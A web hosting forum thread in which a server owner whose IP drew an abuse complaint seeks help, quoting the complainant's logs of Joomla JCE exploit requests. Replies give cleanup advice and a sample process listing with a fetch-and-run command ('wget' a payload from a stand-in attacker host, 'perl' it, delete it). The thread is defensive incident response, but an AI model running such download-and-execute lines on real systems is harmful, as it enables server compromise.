Page 1 of 2 12 LastLast
Results 1 to 25 of 26
  1. #1

    Need Help Urgently

    I have received a message from my server providers that according to them they have received an abuse complaint related to the possible security violation .

    The complaint was below

    Hi,

    We have had hack attempts on our website from your network, from IP address XXXXXXXXXXXXXXX

    We believe this server is compromised by hackers in Turkey, and is part of a botnet attack, possibly using eggdrop bot/psybnc, controlled by UDP via port 80.

    Please check this server for malware or if this is a user account, please inform them that this kind of behaviour is unacceptable.

    The criminal controlling the botnet usually targets CPanel/WHM, WordPress Akismet, Joomla Open Flash Chart library (ofc_upload_image.php) and ccmail installations, so please check any other servers running these.


    They also have told me about logs


    Extract from Logs follows:

    XXXXXXXXXX - - [20/Dec/2013:21:52:51 +1100] "POST /hacker_php.txt&sa=U&ei=FiK0Uo3wKYmo4ASHtYCgCQ&ved=0CNwBEBYwOg&usg=AFQjCNG_6FCfORSAtHGZcEWx3SOqZGD6LQ/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c 8e20b HTTP/1.1" 400 -

    XXXXXXXXXXXX - - [20/Dec/2013:21:52:51 +1100] "POST /hacker_php.txt&sa=U&ei=FiK0Uo3wKYmo4ASHtYCgCQ&ved=0CNwBEBYwOg&usg=AFQjCNG_6FCfORSAtHGZcEWx3SOqZGD6LQ/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c 8e20b HTTP/1.1" 400 - "-" "BOT/0.1 (BOT for JCE)"

    XXXXXXXXXXXX - - [20/Dec/2013:21:52:51 +1100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c 8e20b HTTP/1.1" 400 -

    XXXXXXXXXX - - [20/Dec/2013:21:52:51 +1100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c 8e20b HTTP/1.1" 400 - "-" "BOT/0.1 (BOT for JCE)"

    XXXXXXXXXXXX - - [20/Dec/2013:21:52:51 +1100] "POST /hacker_php.txt&sa=U&ei=FiK0Uo3wKYmo4ASHtYCgCQ&ved=0CNwBEBYwOg&usg=AFQjCNG_6FCfORSAtHGZcEWx3SOqZGD6LQ/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 403 16813

    XXXXXXXXXXXX - - [20/Dec/2013:21:52:51 +1100] "POST /hacker_php.txt&sa=U&ei=FiK0Uo3wKYmo4ASHtYCgCQ&ved=0CNwBEBYwOg&usg=AFQjCNG_6FCfORSAtHGZcEWx3SOqZGD6LQ/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 403 16813 "-" "BOT/0.1 (BOT for JCE)"

    XXXXXXXXXXXXX - - [20/Dec/2013:21:52:51 +1100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 403 16813

    XXXXXXXXXXXXX - - [20/Dec/2013:21:52:51 +1100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 403 16813 "-" "BOT/0.1 (BOT for JCE)"

    XXXXXXXXXXXXX - - [20/Dec/2013:21:52:51 +1100] "GET /hacker_php.txt&sa=U&ei=FiK0Uo3wKYmo4ASHtYCgCQ&ved=0CNwBEBYwOg&usg=AFQjCNG_6FCfORSAtHGZcEWx3SOqZGD6LQ//images/stories/localhost.php?rf HTTP/1.1" 200 16813

    XXXXXXXXXXXXX - - [20/Dec/2013:21:52:51 +1100] "GET /hacker_php.txt&sa=U&ei=FiK0Uo3wKYmo4ASHtYCgCQ&ved=0CNwBEBYwOg&usg=AFQjCNG_6FCfORSAtHGZcEWx3SOqZGD6LQ//images/stories/localhost.php?rf HTTP/1.1" 200 16813 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

    XXXXXXXXXXXXX - - [20/Dec/2013:21:52:52 +1100] "GET //images/stories/localhost.php?rf HTTP/1.1" 200 16813

    XXXXXXXXXXXXX - - [20/Dec/2013:21:52:52 +1100] "GET //images/stories/localhost.php?rf HTTP/1.1" 200 16813 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

    Please help me how can I get rid of this problem.

  2. #2
    Join Date
    Apr 2003
    Location
    London, UK
    Posts
    4,721
    Quote Originally Posted by mudaber View Post
    Please help me how can I get rid of this problem.
    Firstly, is it a client account / server or your own personal machine? If the latter then you need somebody to provide a security audit. If it's a client then you need to engage with them accordingly.

  3. #3
    Yes its my personal machine. can you tell me how can I defined the effected part of my server through SSH

  4. #4
    Join Date
    Apr 2003
    Location
    London, UK
    Posts
    4,721
    It's likely a compromised script on your server, but it could be so many things that if you don't know where to start you need to hire somebody that can identify the exact issue and secure it for you.

    In the meantime you should at least respond to your provider and let them know you are looking at it. They may even offer a management service that can assist in finding the issue?

    Nobody can give you a step-by-step fix from what you've posted. People could suggest a hundred different things without one solving the problem.

  5. #5
    Join Date
    Apr 2002
    Location
    Seaside, CA
    Posts
    213
    Maybe start by CHMOD /hacker_php.txt to 000?
    Did you take a look at what's in there?

  6. #6
    I am really thankful to both of you Loon and codeNSupport. I want to tell your something more about my affected IP which complainant have mentioned in his mail. I am using this IP as my whm/cpanel primary IP. Even I am using this IP with my website too. This website has wordpress. I have also 3 other IPs which I am using with my other websites. CodeNSupport you have told me about CHMOD/hacker_php.txt to 000 kindly tell me how can I check it in my wordpress or ftp

  7. #7
    Join Date
    Nov 2003
    Location
    Texas, United States
    Posts
    115
    Based on the URL, the "hacker_php.txt" file would reside in your web site's root directory. If you use a GUI FTP application, log into your server with it, navigate to your web root directory, left click the file and there may be an option to change permissions.

    As you are running WordPress, have you been keeping it up to date (along with any plugins)?
    Tim Benoit

  8. #8
    Join Date
    Apr 2002
    Location
    Seaside, CA
    Posts
    213
    I may have misunderstood.

    Is this your site being compromised?

    Or is your IP compromising another site?

    Are all the XXXXXXXXXXX redacted IPs you list the same IP or are some different?
    Last edited by EStarr; 01-06-2014 at 06:51 PM. Reason: IP Q

  9. #9
    Join Date
    Jan 2005
    Location
    Scotland, UK
    Posts
    2,681
    That looks like a log from another server showing your systems IP attempting to access the files located on another server so I don't think looking for hacker_php.txt/etc is going to help. You should be looking for backdoors on your system that are scanning other remote systems.

    If it is the log from your system they didn't get any ~200 OK responses.

    What you should do is review your accounts for outdated applications and get them updated, maybe look for recently modified files too.
    Server Management - AdminGeekZ.com
    Infrastructure Management, Web Application Performance, mySQL DBA. System Automation.
    WordPress/Magento Performance, Apache to Nginx Conversion, Varnish Implimentation, DDoS Protection, Custom Nginx Modules
    Check our wordpress varnish plugin. Contact us for quote: sales@admingeekz.com

  10. #10
    CodeNSupport it is the same IP which I had changed with XXXXXXXXXX. Second thing is that I have updated my wordpress application rights now. But there is a confusion which tbenoit has prescribed. Will I change CHMOD /hacker_php.txt to public_html directory or any other file which located in outside of the public_html? please guide me I have also attached the image of my FTP client which will assist you that what I want to say.
    Attached Thumbnails Attached Thumbnails 1.jpg   2.jpg  

  11. #11
    log into your server and then:

    ps faux

    look for suspicious processes. usually something along the lines of such:

    apache 3207 0.0 0.0 2456 1132 ? S 10:32 0:00 /bin/bash ./asd
    apache 21554 0.0 0.0 2452 1080 ? S 12:13 0:00 \_ /bin/bash ./su 192.168
    apache 21562 95.0 0.0 1676 492 ? R 12:13 5:41 \_ ./ps 192.168.1.1
    apache 20343 0.0 0.0 2452 1032 ? S 12:04 0:00 sh -c cd /tmp;wget http://badwebsite.hacker.fubar:35489/q.pdf;perl q.pdf;rm -rf q.pdf
    apache 20345 0.0 0.0 5236 1604 ? S 12:04 0:00 \_ wget http://badwebsite.hacker.fubar:35489/q.pdf
    apache 20355 0.0 0.0 2452 1032 ? S 12:04 0:00 sh -c cd /tmp;wget http://badwebsite.hacker.fuba:35489/q.pdf;perl q.pdf;rm -rf q.pdf
    apache 20356 0.0 0.0 5236 1604 ? S 12:04 0:00 \_ wget http://http://badwebsite.hacker.fubar:35489/q.pdf



    do an lsof -np on the process id, you'll likely find the directory where the malicious files are residing:


    COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
    asd 3207 apache cwd DIR 0,107 4096 67668450 /var/tmp/.ssh_auth/.5

    or it may point to an actual home directory to which can make tracking it even easier. poke around in the directories and match up timestamps with logs. check for the time the attacks took place within your access logs to see if any of the traffic leads to sketchy material. if you come across the issue being in a home directory try using grep -r 'eval(base64_decode' and grep -r '{eval(stripslashes', it'll aid in finding the files associated with the attack.


    now everyone is right in saying it could really be a whole slew of things however, in my experience this is the typical issue. however the process itself could easily be masked to something as clamd or even sshd. so just keep and eye out and poke around a bit. if you can't find it, perhaps hire some outside assistance. this is typical botnet activity and can sometimes be rather unpleasent to deal with if you aren't experienced.


    edit: this is me assuming you're using linux for the webserver (you meantion personal machine however you're ftping into your server)
    Last edited by grapenut; 01-07-2014 at 11:25 AM.

  12. #12
    Thanks grapenut for replying me in details . I have logged in my server with root ID and given command of ps faux according to your instruction and found below processes. Are these ok ? If these processes are wrong then tell me what should I do in some more details. I am well know about using of putty through ssh commands but I am not aware about malawar searching and removal commands can you tell me in easy way step by step I will be always thankful to you.

  13. #13
    Attachment
    Attached Thumbnails Attached Thumbnails screen.JPG  

  14. #14
    Join Date
    Nov 2003
    Location
    Texas, United States
    Posts
    115
    Your public_html directory (i.e. your document root) does not appear to have the hacker_php.txt file based on your FTP screenshots (Scott.Mc mentioned this may be the case in his post).

    As to your processes, you only provided a screenshot which doesn't capture all of the processes. Will need to copy/paste them all so they can all be reviewed.

    You probably should engage a company to come in and poke around your server. As it seems your server is running something that reaches out to other servers your best bet may end up being to have the server rebuilt and secured, then reinstall any apps (latest versions) and secure them and then have your server administered regularly. That is possibly the best way to be sure you are rid of whatever is causing this.
    Tim Benoit

  15. #15
    tbenoit thanks again for reply. tbenoit can you tell me the SSH command for seeing the all processes.

  16. #16
    You can see all processes with ps aux, or for only specific user, top -u username, or when you su - useraccount, you can do ps x (for only that user).
    BeltHosting.com Staff. Shared Web Hosting | Reseller Web Hosting | IRCD Hosting | psyBNC/sBNC/eggdrop/znc Hosting
    xShellz Linux Shell & IRCD Hosting.
    24/7 Live & Ticket Support

  17. #17
    I have attached screen shorts of log processes. Now what you say about that processes. Please guide me if these are correct
    Attached Thumbnails Attached Thumbnails 1.JPG   2.JPG  

  18. #18
    Hi,

    It looks like you have compromised accounts or scripts which are generating attacks from your server. Before your server provide completely block the access, I suggest you to hire server management company immediately. It seems you do not have enough experience in managing the server so the best option is to hire someone immediately before you run into more trouble.
    || Web Hosting Blog - Web Hosting security & latest web hosting industry Announcements
    || Web Hosting Discussion - A Web Hosting community

  19. #19
    Join Date
    Oct 2008
    Location
    Chicago, IL
    Posts
    222
    You have updated the WordPress, what about the plugins? Have you compared all the files in your wp-admin and wp-includes folders with the files from a fresh WordPress install? If not, you should.

    Also, check the plugins against new downloads of those same plugins. Yes it takes time, but if you want to find out where the infection is, you'll have to run that.

    Also, check the files in the themes folders. See if any of them are different than known, good backups (that hopefully you have).

    From the log files you provided, that hacker_php.txt isn't on your site, but the infectious code on your site thinks it's on the site it's attacking. You might also look for a folder with an .htaccess file that allows php code to run from a file with a .txt extension.

    It would be something like:

    AddType application/x-httpd-php .txt

    or

    AddHandler application/x-httpd-php .txt

  20. #20
    Mudaber, I told you to use: ps aux, not ps aus.
    BeltHosting.com Staff. Shared Web Hosting | Reseller Web Hosting | IRCD Hosting | psyBNC/sBNC/eggdrop/znc Hosting
    xShellz Linux Shell & IRCD Hosting.
    24/7 Live & Ticket Support

  21. #21
    StefanHOst here are my log processes after given of ps aux command

    hussain 24737 0.0 0.0 59840 10500 ? S 2013 0:00 /usr/sbin/httpd
    hussain 24739 0.0 0.0 59840 10516 ? S 2013 0:00 /usr/sbin/httpd
    hussain 24792 0.0 0.0 59684 10984 ? S 2013 0:00 /usr/sbin/httpd
    hussain 24850 0.0 0.0 59684 10984 ? S 2013 0:00 /usr/sbin/httpd
    hussain 24905 0.0 0.0 71520 12896 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25019 0.0 0.0 57520 8084 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25119 0.0 0.0 57540 6512 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25120 0.1 0.0 56116 6336 ? S 2013 48:06 /usr/sbin/httpd
    hussain 25140 0.0 0.0 60492 4516 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25142 0.0 0.0 60492 4484 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25144 0.0 0.0 60492 4496 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25173 0.0 0.0 57540 6528 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25222 0.0 0.0 57540 6520 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25239 0.0 0.0 59840 10524 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25241 0.0 0.0 59840 10504 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25243 0.0 0.0 59840 10500 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25264 0.0 0.0 60492 4492 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25266 0.0 0.0 60492 4512 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25268 0.0 0.0 60492 4492 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25303 0.0 0.0 70740 12232 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25322 0.9 0.0 56116 7068 ? S 2013 309:13 /usr/sbin/httpd
    hussain 25428 0.0 0.0 60616 11932 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25431 0.0 0.0 60616 11928 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25433 0.0 0.0 60616 11932 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25659 0.0 0.0 57904 9292 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25664 0.0 0.0 71348 12836 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25732 0.0 0.0 57904 9284 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25795 0.0 0.0 57904 9292 ? S 2013 0:00 /usr/sbin/httpd
    root 25943 0.0 0.0 130772 4252 ? S Jan06 0:00 /etc/authlib/au
    hussain 26070 0.0 0.0 70788 12256 ? S 2013 0:00 /usr/sbin/httpd
    hussain 26353 0.0 0.0 57728 8504 ? S 2013 0:00 /usr/sbin/httpd
    hussain 26437 0.0 0.0 71616 13008 ? S 2013 0:00 /usr/sbin/httpd
    hussain 26454 0.0 0.0 57212 8020 ? S 2013 0:00 /usr/sbin/httpd
    hussain 26474 0.0 0.0 70992 12428 ? S 2013 0:00 /usr/sbin/httpd
    hussain 26528 0.1 0.0 70044 11104 ? S 2013 43:23 /usr/sbin/httpd
    hussain 26541 0.0 0.0 56880 8224 ? S 2013 0:00 /usr/sbin/httpd
    hussain 26699 0.1 0.0 56116 7020 ? S 2013 46:24 /usr/sbin/httpd
    hussain 26702 0.8 0.0 70044 11592 ? S 2013 261:05 /usr/sbin/httpd
    hussain 26812 0.0 0.0 57808 9104 ? S 2013 0:00 /usr/sbin/httpd
    nobody 26829 0.0 0.0 76728 4784 ? S 13:39 0:00 /usr/local/apac
    hussain 26875 0.8 0.0 56116 7544 ? S 2013 276:51 /usr/sbin/httpd
    hussain 27052 0.0 0.0 57728 8504 ? S 2013 0:00 /usr/sbin/httpd
    hussain 27090 0.0 0.0 56116 6988 ? S 2013 27:34 /usr/sbin/httpd
    hussain 27265 0.9 0.0 56116 7440 ? S 2013 307:41 /usr/sbin/httpd
    hussain 27272 0.0 0.0 57692 9020 ? S 2013 0:00 /usr/sbin/httpd
    hussain 27475 0.1 0.0 70044 11092 ? S 2013 41:05 /usr/sbin/httpd
    hussain 27504 0.0 0.0 57124 8536 ? S 2013 0:00 /usr/sbin/httpd
    hussain 27526 0.1 0.0 70044 11104 ? S 2013 45:49 /usr/sbin/httpd
    hussain 27560 0.0 0.0 57124 8536 ? S 2013 0:00 /usr/sbin/httpd
    hussain 27630 0.0 0.0 57524 8244 ? S 2013 0:00 /usr/sbin/httpd
    hussain 27654 0.8 0.0 70044 11592 ? S 2013 243:27 /usr/sbin/httpd
    hussain 27670 0.0 0.0 56116 7012 ? S 2013 12:37 /usr/sbin/httpd
    hussain 27703 0.9 0.0 70044 11616 ? S 2013 281:35 /usr/sbin/httpd
    hussain 27735 0.0 0.0 57524 8232 ? S 2013 0:00 /usr/sbin/httpd
    hussain 27771 0.1 0.0 56116 7020 ? S 2013 46:03 /usr/sbin/httpd
    hussain 27839 0.0 0.0 57524 8208 ? S 2013 0:00 /usr/sbin/httpd
    hussain 27840 0.0 0.0 57728 8496 ? S 2013 0:00 /usr/sbin/httpd
    hussain 27845 0.0 0.1 75968 27396 ? S 2013 1:05 /usr/sbin/httpd
    hussain 27849 0.8 0.0 56116 7540 ? S 2013 180:08 /usr/sbin/httpd
    hussain 27943 0.0 0.0 57524 8244 ? S 2013 0:00 /usr/sbin/httpd
    hussain 27951 0.8 0.0 56116 7540 ? S 2013 276:53 /usr/sbin/httpd
    hussain 27975 0.0 0.0 70332 11808 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28050 0.0 0.0 57524 8244 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28069 0.0 0.0 57644 8956 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28147 0.0 0.0 57644 8956 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28152 0.0 0.0 57524 8240 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28225 0.0 0.0 70332 11808 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28233 0.0 0.0 56724 7952 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28250 0.0 0.0 71412 12644 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28268 0.0 0.0 57524 8232 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28281 0.0 0.0 57300 8676 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28291 0.0 0.0 70332 11800 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28390 0.0 0.0 57524 8244 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28428 0.0 0.0 56768 7896 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28434 0.0 0.0 56768 7900 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28436 0.0 0.0 57300 8676 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28441 0.0 0.0 56768 7904 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28454 0.0 0.0 56768 7908 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28456 0.0 0.0 71452 12856 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28484 0.0 0.0 57236 8568 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28497 0.0 0.0 57524 8212 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28499 0.0 0.0 70332 11804 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28519 0.0 0.0 56768 7904 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28528 0.0 0.0 56768 7904 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28534 0.0 0.0 56768 7904 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28537 0.0 0.0 57044 7700 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28543 0.0 0.0 56768 7904 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28551 0.0 0.0 56768 7904 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28554 0.0 0.0 56768 7904 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28587 0.0 0.0 70332 11808 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28617 0.0 0.0 57524 8240 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28679 0.0 0.0 56724 7956 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28720 0.0 0.0 57524 8204 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28745 0.0 0.0 57044 7672 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28818 0.0 0.0 57808 9104 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28832 0.0 0.0 57524 8208 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28841 0.0 0.0 70332 11808 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28916 0.0 0.0 71616 13000 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28920 0.0 0.0 56724 7952 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28925 0.0 0.0 70332 11808 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28940 0.0 0.0 56768 7908 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28941 0.0 0.0 57524 8236 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28945 0.0 0.0 56768 7908 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28951 0.0 0.0 56768 7908 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28960 0.0 0.0 56724 7948 ? S 2013 0:00 /usr/sbin/httpd
    nobody 29028 0.0 0.0 76728 4804 ? S 13:40 0:00 /usr/local/apac
    hussain 29045 0.0 0.0 57524 8232 ? S 2013 0:00 /usr/sbin/httpd
    root 29084 0.0 0.0 130772 4292 ? S Jan05 0:00 /etc/authlib/au
    nobody 29106 0.0 0.0 76728 4828 ? S 13:40 0:00 /usr/local/apac
    hussain 29127 0.0 0.0 70332 11808 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29144 0.0 0.0 71464 12592 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29148 0.1 0.0 56116 7008 ? S 2013 41:36 /usr/sbin/httpd
    hussain 29206 0.0 0.0 70332 11808 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29216 0.0 0.0 70992 12432 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29322 0.8 0.0 56116 7516 ? S 2013 241:23 /usr/sbin/httpd
    hussain 29463 0.0 0.0 56768 7904 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29466 0.0 0.0 56768 7904 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29472 0.0 0.0 56768 7908 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29539 0.0 0.0 71244 12412 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29553 0.0 0.0 57212 8036 ? S 2013 0:00 /usr/sbin/httpd
    root 29759 0.0 0.0 10648 544 ? S<s 2013 0:00 /sbin/udevd -d
    hussain 29775 0.0 0.0 56768 7896 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29778 0.0 0.0 56768 7904 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29784 0.0 0.0 56768 7900 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29817 0.0 0.0 56768 7908 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29830 0.0 0.0 57520 8136 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29849 0.0 0.0 57524 8244 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29945 0.0 0.0 57524 8240 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30001 0.0 0.0 56768 7900 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30005 0.0 0.0 56768 7908 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30013 0.0 0.0 57524 8236 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30062 0.1 0.0 56116 6960 ? S 2013 47:10 /usr/sbin/httpd
    hussain 30135 0.0 0.0 57524 8244 ? S 2013 0:00 /usr/sbin/httpd
    root 30177 20.7 0.2 154036 48760 ? S Jan07 184:15 /bin/bash /usr/
    hussain 30192 0.1 0.0 56116 6976 ? S 2013 43:15 /usr/sbin/httpd
    hussain 30210 0.0 0.0 57524 8248 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30236 0.0 0.0 57960 9396 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30238 0.9 0.0 56116 7444 ? S 2013 296:56 /usr/sbin/httpd
    hussain 30264 0.0 0.0 58248 9660 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30309 0.0 0.0 57524 8244 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30340 0.0 0.0 58248 9660 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30369 0.8 0.0 56116 7512 ? S 2013 256:04 /usr/sbin/httpd
    hussain 30392 0.0 0.0 57524 8196 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30406 0.0 0.0 57524 8188 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30423 0.0 0.0 58248 9660 ? S 2013 0:00 /usr/sbin/httpd
    nobody 30460 0.0 0.0 76728 4796 ? S 13:41 0:00 /usr/local/apac
    hussain 30480 0.0 0.0 57524 8244 ? S 2013 0:00 /usr/sbin/httpd
    nobody 30521 0.0 0.0 76728 4752 ? S 13:41 0:00 /usr/local/apac
    nobody 30526 0.0 0.0 76732 4764 ? S 13:41 0:00 /usr/local/apac
    hussain 30527 0.0 0.0 57236 8516 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30557 0.0 0.0 57524 8244 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30651 0.0 0.0 57524 8244 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30672 0.1 0.0 70344 12888 ? R 2013 45:54 /usr/sbin/httpd
    hussain 30725 0.0 0.0 71656 13128 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30731 0.0 0.0 57524 8244 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30750 0.0 0.0 71656 13128 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30769 0.0 0.0 71656 13128 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30798 0.0 0.0 57524 8248 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30882 0.0 0.0 57524 8248 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30937 0.0 0.0 71736 13196 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30963 0.0 0.0 57524 8244 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30993 0.1 0.0 56116 7008 ? S 2013 43:08 /usr/sbin/httpd
    hussain 31016 0.0 0.0 59644 10760 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31018 0.0 0.0 59644 10764 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31020 0.0 0.0 59644 10760 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31029 0.0 0.0 59644 10760 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31081 0.0 0.0 59644 10752 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31083 0.0 0.0 59644 10760 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31085 0.0 0.0 59644 10752 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31097 0.0 0.0 59644 10760 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31099 0.0 0.0 59644 10756 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31101 0.0 0.0 59644 10760 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31183 0.0 0.0 71348 12836 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31186 0.8 0.0 56116 7540 ? S 2013 254:56 /usr/sbin/httpd
    root 31282 0.0 0.0 104484 4180 ? Ss 13:04 0:00 sshd: root@pts/
    hussain 31421 0.0 0.0 59644 10760 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31423 0.0 0.0 59644 10768 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31425 0.0 0.0 59644 10760 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31460 0.1 0.0 56116 7020 ? S 2013 44:46 /usr/sbin/httpd
    hussain 31505 0.0 0.0 70992 12432 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31633 0.8 0.0 56116 7520 ? S 2013 274:40 /usr/sbin/httpd
    hussain 31635 0.0 0.0 57808 9104 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31751 0.0 0.0 59644 10768 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31753 0.0 0.0 59644 10768 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31826 0.0 0.0 57212 8036 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31840 0.0 0.0 59644 10764 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31842 0.0 0.0 59644 10764 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31845 0.0 0.0 59644 10764 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31854 0.0 0.0 57316 8684 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31857 0.0 0.0 59644 10760 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31859 0.0 0.0 59644 10764 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31881 0.0 0.0 57580 8776 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31883 0.0 0.0 57580 8776 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31885 0.0 0.0 57580 8776 ? S 2013 0:00 /usr/sbin/httpd
    root 31953 0.0 0.0 108332 1764 pts/0 Ss 13:04 0:00 -bash
    root 32051 0.0 0.0 66604 596 ? Ss 2013 1:20 /usr/sbin/sshd
    hussain 32057 0.0 0.0 57504 8812 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32061 0.0 0.0 59644 10748 ? S 2013 0:00 /usr/sbin/httpd
